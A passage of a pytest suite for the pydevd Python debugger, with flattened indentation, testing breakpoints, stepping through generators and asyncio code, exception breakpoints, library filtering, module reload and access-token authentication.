assert hasattr(writer, 'FORCE_KILL_PROCESS_WHEN_FINISHED_OK')
writer.FORCE_KILL_PROCESS_WHEN_FINISHED_OK = True
writer.log.append('making initial run')
writer.write_make_initial_run()
if authenticate:
writer.wait_for_message(lambda msg:'Client not authenticated.' in msg, expect_xml=False)
writer.write_authenticate(access_token=access_token, client_access_token=client_access_token)
writer.write_make_initial_run()
writer.log.append('waiting for breakpoint hit')
hit = writer.wait_for_breakpoint_hit()
writer.secondary_multi_proc_process_writer = secondary_multi_proc_process_writer = \
_SecondaryMultiProcProcessWriterThread(writer.server_socket)
secondary_multi_proc_process_writer.start()
writer.log.append('run thread')
writer.write_run_thread(hit.thread_id)
for _i in xrange(400):
if secondary_multi_proc_process_writer.finished_ok:
break
time.sleep(.1)
else:
writer.log.append('Secondary process not finished ok!')
raise AssertionError('Secondary process not finished ok!')
writer.log.append('Secondary process finished!')
try:
assert writer._sequence == 5 if not authenticate else 9, 'Found: %s' % writer._sequence
except:
writer.log.append('assert failed!')
raise
writer.log.append('asserted')
writer.finished_ok = True
@pytest.mark.parametrize('handle', [True, False])
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_remote_unhandled_exceptions(case_setup_remote, handle):
def check_test_suceeded_msg(writer, stdout, stderr):
return 'TEST SUCEEDED' in ''.join(stderr)
def additional_output_checks(writer, stdout, stderr):
# Don't call super as we have an expected exception
assert 'ValueError: TEST SUCEEDED' in stderr
with case_setup_remote.test_file(
'_debugger_case_remote_unhandled_exceptions.py',
additional_output_checks=additional_output_checks,
check_test_suceeded_msg=check_test_suceeded_msg,
EXPECTED_RETURNCODE=1) as writer:
writer.log.append('making initial run')
writer.write_make_initial_run()
writer.log.append('waiting for breakpoint hit')
hit = writer.wait_for_breakpoint_hit()
# Add, remove and add back
writer.write_add_exception_breakpoint_with_policy('Exception', '0', '1', '0')
writer.write_remove_exception_breakpoint('Exception')
writer.write_add_exception_breakpoint_with_policy('Exception', '0', '1', '0')
if not handle:
writer.write_remove_exception_breakpoint('Exception')
writer.log.append('run thread')
writer.write_run_thread(hit.thread_id)
if handle:
writer.log.append('waiting for uncaught exception')
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
writer.log.append('finished ok')
writer.finished_ok = True
def test_trace_dispatch_correct(case_setup):
def get_environ(writer):
env = os.environ.copy()
env['PYDEVD_USE_FRAME_EVAL'] = 'NO' # This test checks trace dispatch (so, disable frame eval).
return env
with case_setup.test_file('_debugger_case_trace_dispatch.py', get_environ=get_environ) as writer:
breakpoint_id = writer.write_add_breakpoint(5, 'method')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_PY26, reason='Failing on Python 2.6 on travis (needs investigation).')
def test_case_single_notification_on_step(case_setup):
from tests_python.debugger_unittest import REASON_STEP_INTO
with case_setup.test_file('_debugger_case_import_main.py') as writer:
writer.write_multi_threads_single_notification(True)
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'), '')
writer.write_make_initial_run()
hit = writer.wait_for_single_notification_as_hit()
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_single_notification_as_hit(reason=REASON_STEP_INTO)
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_single_notification_as_hit(reason=REASON_STEP_INTO)
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_single_notification_as_hit(reason=REASON_STEP_INTO)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Not ok for Jython.')
def test_reload(case_setup, tmpdir):
def additional_output_checks(writer, stdout, stderr):
# Don't call super as we have an expected exception
for line in (
'pydev debugger: Start reloading module: "my_temp2"',
'pydev debugger: Updated function code: <function call',
'pydev debugger: reload finished',
):
if line not in stderr:
raise AssertionError('%s" not in stderr.\nstdout:\n%s\n\nstderr:\n%s' % (
line, stdout, stderr))
path = tmpdir.join('my_temp.py')
path.write('''
import my_temp2
assert my_temp2.call() == 1
a = 10 # break here
assert my_temp2.call() == 2
print('TEST SUCEEDED!')
''')
path2 = tmpdir.join('my_temp2.py')
path2.write('''
def call():
return 1
''')
with case_setup.test_file(str(path), additional_output_checks=additional_output_checks) as writer:
break_line = writer.get_line_index_with_content('break here')
writer.write_add_breakpoint(break_line, '')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
path2 = tmpdir.join('my_temp2.py')
path2.write('''
def call():
return 2
''')
writer.write_reload('my_temp2')
writer.wait_for_message(CMD_RELOAD_CODE)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Not working with Jython on ci (needs investigation).')
def test_custom_frames(case_setup):
with case_setup.test_file('_debugger_case_custom_frames.py') as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
for i in range(3):
writer.write_step_over(hit.thread_id)
# Check that the frame-related threads have been killed.
for _ in range(i):
writer.wait_for_message(CMD_THREAD_KILL, expect_xml=False)
# Main thread stopped
writer.wait_for_breakpoint_hit(REASON_STEP_OVER)
# At each time we have an additional custom frame (which is shown as if it
# was a thread which is created and then suspended).
for _ in range(i):
writer.wait_for_message(CMD_THREAD_CREATE)
writer.wait_for_breakpoint_hit(REASON_THREAD_SUSPEND)
writer.write_run_thread(hit.thread_id)
# Check that the frame-related threads have been killed.
for _ in range(i):
try:
writer.wait_for_message(CMD_THREAD_KILL, expect_xml=False, timeout=1)
except debugger_unittest.TimeoutError:
# Flaky: sometimes the thread kill is not received because
# the process exists before the message is sent.
break
writer.finished_ok = True
@pytest.mark.skipif(not TEST_GEVENT, reason='Gevent not installed.')
def test_gevent(case_setup):
def get_environ(writer):
env = os.environ.copy()
env['GEVENT_SUPPORT'] = 'True'
return env
with case_setup.test_file('_debugger_case_gevent.py', get_environ=get_environ) as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
for _i in range(10):
hit = writer.wait_for_breakpoint_hit(name='run')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not TEST_GEVENT, reason='Gevent not installed.')
def test_gevent_remote(case_setup_remote):
def get_environ(writer):
env = os.environ.copy()
env['GEVENT_SUPPORT'] = 'True'
return env
with case_setup_remote.test_file('_debugger_case_gevent.py', get_environ=get_environ, append_command_line_args=['remote']) as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
for _i in range(10):
hit = writer.wait_for_breakpoint_hit(name='run')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_return_value(case_setup):
with case_setup.test_file('_debugger_case_return_value.py') as writer:
break_line = writer.get_line_index_with_content('break here')
writer.write_add_breakpoint(break_line)
writer.write_show_return_vars()
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(name='main', line=break_line)
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_STEP_OVER, name='main', line=break_line + 1)
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_vars([
[
'<var name="method1" type="int" qualifier="%s" value="int: 1" isRetVal="True"' % (builtin_qualifier,),
'<var name="method1" type="int" value="int%253A 1" isRetVal="True"',
],
])
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_STEP_OVER, name='main', line=break_line + 2)
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_vars([
[
'<var name="method2" type="int" qualifier="%s" value="int: 2" isRetVal="True"' % (builtin_qualifier,),
'<var name="method2" type="int" value="int%253A 2" isRetVal="True"',
],
])
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Jython can only have one thread stopped at each time.')
@pytest.mark.parametrize('check_single_notification', [True, False])
def test_run_pause_all_threads_single_notification(case_setup, check_single_notification):
from tests_python.debugger_unittest import TimeoutError
with case_setup.test_file('_debugger_case_multiple_threads.py') as writer:
# : :type writer: AbstractWriterThread
writer.write_multi_threads_single_notification(True)
writer.write_make_initial_run()
main_thread_id = writer.wait_for_new_thread()
thread_id1 = writer.wait_for_new_thread()
thread_id2 = writer.wait_for_new_thread()
# Ok, all threads created, let's wait for the main thread to get to the join.
writer.wait_for_thread_join(main_thread_id)
writer.write_suspend_thread('*')
if check_single_notification:
dct = writer.wait_for_json_message(CMD_THREAD_SUSPEND_SINGLE_NOTIFICATION)
assert dct['thread_id'] in (thread_id1, thread_id2)
assert dct['stop_reason'] == REASON_THREAD_SUSPEND
else:
# We should have a single thread suspended event for both threads.
hit0 = writer.wait_for_breakpoint_hit(REASON_THREAD_SUSPEND)
assert hit0.thread_id in (thread_id1, thread_id2)
hit1 = writer.wait_for_breakpoint_hit(REASON_THREAD_SUSPEND)
assert hit1.thread_id in (thread_id1, thread_id2)
with pytest.raises(TimeoutError):
# The main thread should not receive a hit as it's effectively deadlocked until other
# threads finish.
writer.wait_for_breakpoint_hit(REASON_THREAD_SUSPEND, timeout=1)
# Doing a step in in one thread, when paused should notify on both threads.
writer.write_step_over(thread_id1)
if check_single_notification:
dct = writer.wait_for_json_message(CMD_THREAD_RESUME_SINGLE_NOTIFICATION) # Note: prefer wait_for_single_notification_as_hit
assert dct['thread_id'] == thread_id1
dct = writer.wait_for_json_message(CMD_THREAD_SUSPEND_SINGLE_NOTIFICATION) # Note: prefer wait_for_single_notification_as_hit
assert dct['thread_id'] == thread_id1
assert dct['stop_reason'] == REASON_STEP_OVER
hit = writer.get_current_stack_hit(thread_id1)
else:
hit = writer.wait_for_breakpoint_hit(CMD_STEP_OVER)
writer.write_evaluate_expression('%s\t%s\t%s' % (hit.thread_id, hit.frame_id, 'LOCAL'), 'stop_loop()')
writer.wait_for_evaluation('<var name="stop_loop()" type="str" qualifier="{0}" value="str: stopped_loop'.format(builtin_qualifier))
writer.write_run_thread('*')
writer.finished_ok = True
def scenario_uncaught(writer):
hit = writer.wait_for_breakpoint_hit()
writer.write_add_exception_breakpoint_with_policy('ValueError', '0', '1', '0')
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
def scenario_caught(writer):
hit = writer.wait_for_breakpoint_hit()
writer.write_add_exception_breakpoint_with_policy('ValueError', '1', '0', '0')
writer.write_run_thread(hit.thread_id)
for _ in range(2):
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
# Note: the one in the top-level will be hit once as caught (but not another time
# in postmortem mode).
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
def scenario_caught_and_uncaught(writer):
hit = writer.wait_for_breakpoint_hit()
writer.write_add_exception_breakpoint_with_policy('ValueError', '1', '1', '0')
writer.write_run_thread(hit.thread_id)
for _ in range(2):
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
# Note: the one in the top-level will be hit once as caught and another in postmortem mode.
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
@pytest.mark.parametrize(
'check_scenario',
[
scenario_uncaught,
scenario_caught,
scenario_caught_and_uncaught,
]
)
def test_top_level_exceptions_on_attach(case_setup_remote, check_scenario):
def check_test_suceeded_msg(writer, stdout, stderr):
return 'TEST SUCEEDED' in ''.join(stderr)
def additional_output_checks(writer, stdout, stderr):
# Don't call super as we have an expected exception
assert 'ValueError: TEST SUCEEDED' in stderr
with case_setup_remote.test_file(
'_debugger_case_remote_unhandled_exceptions2.py',
additional_output_checks=additional_output_checks,
check_test_suceeded_msg=check_test_suceeded_msg,
EXPECTED_RETURNCODE=1) as writer:
writer.log.append('making initial run')
writer.write_make_initial_run()
check_scenario(writer)
writer.log.append('finished ok')
writer.finished_ok = True
@pytest.mark.parametrize('filename, break_at_lines', [
# Known limitation: when it's added to the first line of the module, the
# module becomes traced.
('_debugger_case_tracing.py', {2: 'trace'}),
('_debugger_case_tracing.py', {3: 'frame_eval'}),
('_debugger_case_tracing.py', {4: 'frame_eval'}),
('_debugger_case_tracing.py', {2: 'trace', 4: 'trace'}),
('_debugger_case_tracing.py', {8: 'frame_eval'}),
('_debugger_case_tracing.py', {9: 'frame_eval'}),
('_debugger_case_tracing.py', {10: 'frame_eval'}),
# Note: second frame eval hit is actually a trace because after we
# hit the first frame eval we don't actually stop tracing a given
# frame (known limitation to be fixed in the future).
# -- needs a better test
('_debugger_case_tracing.py', {8: 'frame_eval', 10: 'frame_eval'}),
])
def test_frame_eval_limitations(case_setup, filename, break_at_lines):
'''
Test with limitations to be addressed in the future.
'''
with case_setup.test_file(filename) as writer:
for break_at_line in break_at_lines:
writer.write_add_breakpoint(break_at_line)
writer.log.append('making initial run')
writer.write_make_initial_run()
for break_at_line, break_mode in break_at_lines.items():
writer.log.append('waiting for breakpoint hit')
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
if IS_PY36_OR_GREATER and TEST_CYTHON:
assert hit.suspend_type == break_mode
else:
# Before 3.6 frame eval is not available.
assert hit.suspend_type == 'trace'
writer.log.append('run thread')
writer.write_run_thread(thread_id)
writer.finished_ok = True
def test_step_return_my_code(case_setup):
with case_setup.test_file('my_code/my_code.py') as writer:
writer.write_set_project_roots([debugger_unittest._get_debugger_test_file('my_code')])
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_step_in_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO_MY_CODE)
assert hit.name == 'callback1'
writer.write_step_in_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO_MY_CODE)
assert hit.name == 'callback2'
writer.write_step_return_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_RETURN_MY_CODE)
assert hit.name == 'callback1'
writer.write_step_return_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_RETURN_MY_CODE)
assert hit.name == '<module>'
writer.write_step_return_my_code(hit.thread_id)
writer.finished_ok = True
def test_step_over_my_code(case_setup):
with case_setup.test_file('my_code/my_code.py') as writer:
writer.write_set_project_roots([debugger_unittest._get_debugger_test_file('my_code')])
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_step_in_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO_MY_CODE)
assert hit.name == 'callback1'
writer.write_step_in_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO_MY_CODE)
assert hit.name == 'callback2'
writer.write_step_over_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_OVER_MY_CODE) # Note: goes from step over to step into
assert hit.name == 'callback1'
writer.write_step_over_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_OVER_MY_CODE) # Note: goes from step over to step into
assert hit.name == '<module>'
writer.write_step_over_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_OVER_MY_CODE)
assert hit.name == '<module>'
writer.write_step_over_my_code(hit.thread_id)
writer.finished_ok = True
@pytest.fixture(
params=[
'step_over',
'step_return',
'step_in',
]
)
def step_method(request):
return request.param
def test_sysexit_on_filtered_file(case_setup):
def get_environ(writer):
env = os.environ.copy()
env.update({'PYDEVD_FILTERS': json.dumps({'**/_debugger_case_sysexit.py': True})})
return env
with case_setup.test_file('_debugger_case_sysexit.py', get_environ=get_environ, EXPECTED_RETURNCODE=1) as writer:
writer.write_add_exception_breakpoint_with_policy(
'SystemExit',
notify_on_handled_exceptions=1, # Notify multiple times
notify_on_unhandled_exceptions=1,
ignore_libraries=0
)
writer.write_make_initial_run()
writer.finished_ok = True
@pytest.mark.parametrize("scenario", [
'handled_once',
'handled_multiple',
'unhandled',
])
def test_exception_not_on_filtered_file(case_setup, scenario):
def get_environ(writer):
env = os.environ.copy()
env.update({'PYDEVD_FILTERS': json.dumps({'**/other.py': True})})
return env
def check_test_suceeded_msg(writer, stdout, stderr):
return 'TEST SUCEEDED' in ''.join(stderr)
def additional_output_checks(writer, stdout, stderr):
if 'raise RuntimeError' not in stderr:
raise AssertionError('Expected test to have an unhandled exception.\nstdout:\n%s\n\nstderr:\n%s' % (
stdout, stderr))
with case_setup.test_file(
'my_code/my_code_exception.py',
get_environ=get_environ,
EXPECTED_RETURNCODE='any',
check_test_suceeded_msg=check_test_suceeded_msg,
additional_output_checks=additional_output_checks,
) as writer:
if scenario == 'handled_once':
writer.write_add_exception_breakpoint_with_policy(
'RuntimeError',
notify_on_handled_exceptions=2, # Notify only once
notify_on_unhandled_exceptions=0,
ignore_libraries=0
)
elif scenario == 'handled_multiple':
writer.write_add_exception_breakpoint_with_policy(
'RuntimeError',
notify_on_handled_exceptions=1, # Notify multiple times
notify_on_unhandled_exceptions=0,
ignore_libraries=0
)
elif scenario == 'unhandled':
writer.write_add_exception_breakpoint_with_policy(
'RuntimeError',
notify_on_handled_exceptions=0,
notify_on_unhandled_exceptions=1,
ignore_libraries=0
)
writer.write_make_initial_run()
for _i in range(3 if scenario == 'handled_multiple' else 1):
hit = writer.wait_for_breakpoint_hit(
REASON_UNCAUGHT_EXCEPTION if scenario == 'unhandled' else REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_exception_on_filtered_file(case_setup):
def get_environ(writer):
env = os.environ.copy()
env.update({'PYDEVD_FILTERS': json.dumps({'**/other.py': True})})
return env
def check_test_suceeded_msg(writer, stdout, stderr):
return 'TEST SUCEEDED' in ''.join(stderr)
def additional_output_checks(writer, stdout, stderr):
if 'raise RuntimeError' not in stderr:
raise AssertionError('Expected test to have an unhandled exception.\nstdout:\n%s\n\nstderr:\n%s' % (
stdout, stderr))
with case_setup.test_file(
'my_code/my_code_exception_on_other.py',
get_environ=get_environ,
EXPECTED_RETURNCODE='any',
check_test_suceeded_msg=check_test_suceeded_msg,
additional_output_checks=additional_output_checks,
) as writer:
writer.write_add_exception_breakpoint_with_policy(
'RuntimeError',
notify_on_handled_exceptions=2, # Notify only once
notify_on_unhandled_exceptions=1,
ignore_libraries=0
)
writer.write_make_initial_run()
# Note: the unhandled exception was initially raised in a file which is filtered out, but we
# should be able to see the frames which are part of the project.
hit = writer.wait_for_breakpoint_hit(
REASON_UNCAUGHT_EXCEPTION,
file='my_code_exception_on_other.py',
line=writer.get_line_index_with_content('other.raise_exception()')
)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.parametrize("environ", [
{'PYDEVD_FILTER_LIBRARIES': '1'}, # Global setting for step over
{'PYDEVD_FILTERS': json.dumps({'**/other.py': True})}, # specify as json
{'PYDEVD_FILTERS': '**/other.py'}, # specify ';' separated list
])
@pytest.mark.skipif(IS_JYTHON, reason='Flaky on Jython.')
def test_step_over_my_code_global_settings(case_setup, environ, step_method):
def get_environ(writer):
env = os.environ.copy()
env.update(environ)
return env
def do_step():
if step_method == 'step_over':
writer.write_step_over(hit.thread_id)
return REASON_STEP_OVER # Note: goes from step over to step into
elif step_method == 'step_return':
writer.write_step_return(hit.thread_id)
return REASON_STEP_RETURN
else:
assert step_method == 'step_in'
writer.write_step_in(hit.thread_id)
return REASON_STEP_INTO
with case_setup.test_file('my_code/my_code.py', get_environ=get_environ) as writer:
writer.write_set_project_roots([debugger_unittest._get_debugger_test_file('my_code')])
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO)
assert hit.name == 'callback1'
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO)
assert hit.name == 'callback2'
stop_reason = do_step()
hit = writer.wait_for_breakpoint_hit(reason=stop_reason)
assert hit.name == 'callback1'
stop_reason = do_step()
hit = writer.wait_for_breakpoint_hit(reason=stop_reason)
assert hit.name == '<module>'
if IS_JYTHON:
# Jython may get to exit functions, so, just resume the thread.
writer.write_run_thread(hit.thread_id)
else:
stop_reason = do_step()
if step_method != 'step_return':
stop_reason = do_step()
if step_method == 'step_over':
stop_reason = REASON_STEP_OVER
hit = writer.wait_for_breakpoint_hit(reason=stop_reason)
assert hit.name == '<module>'
writer.write_step_over(hit.thread_id)
writer.finished_ok = True
def test_step_over_my_code_global_setting_and_explicit_include(case_setup):
def get_environ(writer):
env = os.environ.copy()
env.update({
'PYDEVD_FILTER_LIBRARIES': '1', # Global setting for in project or not
# specify as json (force include).
'PYDEVD_FILTERS': json.dumps({'**/other.py': False})
})
return env
with case_setup.test_file('my_code/my_code.py', get_environ=get_environ) as writer:
writer.write_set_project_roots([debugger_unittest._get_debugger_test_file('my_code')])
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO)
# Although we filtered out non-project files, other.py is explicitly included.
assert hit.name == 'call_me_back1'
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_access_token(case_setup):
def update_command_line_args(self, args):
args.insert(2, '--access-token')
args.insert(3, 'bar123')
args.insert(2, '--client-access-token')
args.insert(3, 'foo234')
return args
with case_setup.test_file('_debugger_case_print.py', update_command_line_args=update_command_line_args) as writer:
writer.write_add_breakpoint(1, 'None') # I.e.: should not work (not authenticated).
writer.wait_for_message(lambda msg:'Client not authenticated.' in msg, expect_xml=False)
writer.write_authenticate(access_token='bar123', client_access_token='foo234')
writer.write_version()
writer.write_make_initial_run()
writer.finished_ok = True
def test_namedtuple(case_setup):
'''
Check that we don't step into <string> in the namedtuple constructor.
'''
with case_setup.test_file('_debugger_case_namedtuple.py') as writer:
line = writer.get_line_index_with_content('break here')
writer.write_add_breakpoint(line)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
expected_line = line
for _ in range(2):
expected_line += 1
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
reason=REASON_STEP_INTO, file='_debugger_case_namedtuple.py', line=expected_line)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_matplotlib_activation(case_setup):
try:
import matplotlib
except ImportError:
return
def get_environ(writer):
env = os.environ.copy()
env.update({
'IPYTHONENABLE': 'True',
})
return env
with case_setup.test_file('_debugger_case_matplotlib.py', get_environ=get_environ) as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
for _ in range(3):
hit = writer.wait_for_breakpoint_hit()
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
_GENERATOR_FILES = [
'_debugger_case_generator3.py',
]
if not IS_PY2:
_GENERATOR_FILES.append('_debugger_case_generator.py')
_GENERATOR_FILES.append('_debugger_case_generator2.py')
@pytest.mark.parametrize('target_filename', _GENERATOR_FILES)
@pytest.mark.skipif(IS_JYTHON, reason='We do not detect generator returns on Jython.')
def test_generator_step_over_basic(case_setup, target_filename):
with case_setup.test_file(target_filename) as writer:
line = writer.get_line_index_with_content('break here')
writer.write_add_breakpoint(line)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
# Note: not using for so that we know which step failed in the ci if it fails.
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
reason=REASON_STEP_OVER,
file=target_filename,
line=writer.get_line_index_with_content('step 1')
)
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
reason=REASON_STEP_OVER,
file=target_filename,
line=writer.get_line_index_with_content('step 2')
)
if IS_PY38_OR_GREATER and target_filename == '_debugger_case_generator2.py':
# On py 3.8 it goes back to the return line.
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
reason=REASON_STEP_OVER,
file=target_filename,
line=writer.get_line_index_with_content('return \\')
)
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
reason=REASON_STEP_OVER,
file=target_filename,
line=writer.get_line_index_with_content('step 3')
)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.parametrize('target_filename', _GENERATOR_FILES)
@pytest.mark.skipif(IS_JYTHON, reason='We do not detect generator returns on Jython.')
def test_generator_step_return(case_setup, target_filename):
with case_setup.test_file(target_filename) as writer:
line = writer.get_line_index_with_content('break here')
writer.write_add_breakpoint(line)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
# Note: not using for so that we know which step failed in the ci if it fails.
writer.write_step_return(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
reason=REASON_STEP_RETURN,
file=target_filename,
line=writer.get_line_index_with_content('generator return')
)
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
reason=REASON_STEP_OVER,
file=target_filename,
line=writer.get_line_index_with_content('step 3')
)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not IS_PY36_OR_GREATER, reason='Only CPython 3.6 onwards')
def test_stepin_not_my_code_coroutine(case_setup):
def get_environ(writer):
environ = {'PYDEVD_FILTERS': '{"**/not_my_coroutine.py": true}'}
env = os.environ.copy()
env.update(environ)
return env
with case_setup.test_file('my_code/my_code_coroutine.py', get_environ=get_environ) as writer:
writer.write_set_project_roots([debugger_unittest._get_debugger_test_file('my_code')])
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO)
assert hit.name == 'main'
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Flaky on Jython')
def test_generator_step_in(case_setup):
with case_setup.test_file('_debugger_case_generator_step_in.py') as writer:
line = writer.get_line_index_with_content('stop 1')
writer.write_add_breakpoint(line)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
for i in range(2, 5):
writer.write_step_in(hit.thread_id)
kwargs = {}
if not IS_JYTHON:
kwargs['line'] = writer.get_line_index_with_content('stop %s' % (i,))
hit = writer.wait_for_breakpoint_hit(
reason=REASON_STEP_INTO,
file='_debugger_case_generator_step_in.py',
**kwargs
)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.parametrize(
'target_filename',
[
'_debugger_case_asyncio.py',
'_debugger_case_trio.py',
]
)
@pytest.mark.skipif(not IS_CPYTHON or not IS_PY36_OR_GREATER, reason='Only CPython 3.6 onwards')
def test_asyncio_step_over_basic(case_setup, target_filename):
with case_setup.test_file(target_filename) as writer:
line = writer.get_line_index_with_content('break main')
writer.write_add_breakpoint(line)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
reason=REASON_STEP_OVER,
file=target_filename,
line=writer.get_line_index_with_content('step main')
)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.parametrize(
'target_filename',
[
'_debugger_case_asyncio.py',
'_debugger_case_trio.py',
]
)
@pytest.mark.skipif(not IS_CPYTHON or not IS_PY36_OR_GREATER, reason='Only CPython 3.6 onwards')
def test_asyncio_step_over_end_of_function(case_setup, target_filename):
with case_setup.test_file(target_filename) as writer:
line = writer.get_line_index_with_content('break count 2')
writer.write_add_breakpoint(line)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
reason=REASON_STEP_OVER,
name=('sleep', 'wait_task_rescheduled'),
)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.parametrize(
'target_filename',
[
'_debugger_case_asyncio.py',
'_debugger_case_trio.py',
]
)
@pytest.mark.skipif(not IS_CPYTHON or not IS_PY36_OR_GREATER, reason='Only CPython 3.6 onwards')
def test_asyncio_step_in(case_setup, target_filename):
with case_setup.test_file(target_filename) as writer:
line = writer.get_line_index_with_content('break count 1')
writer.write_add_breakpoint(line)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_step_return(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
reason=REASON_STEP_RETURN,
file=target_filename,
line=writer.get_line_index_with_content('break main')
)
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
reason=REASON_STEP_INTO,
name=('sleep', 'wait_task_rescheduled'),
)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.parametrize(
'target_filename',
[
'_debugger_case_asyncio.py',
'_debugger_case_trio.py',
]
)
@pytest.mark.skipif(not IS_CPYTHON or not IS_PY36_OR_GREATER, reason='Only CPython 3.6 onwards')
def test_asyncio_step_return(case_setup, target_filename):
with case_setup.test_file(target_filename) as writer:
line = writer.get_line_index_with_content('break count 1')
writer.write_add_breakpoint(line)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_step_return(hit.thread_id)
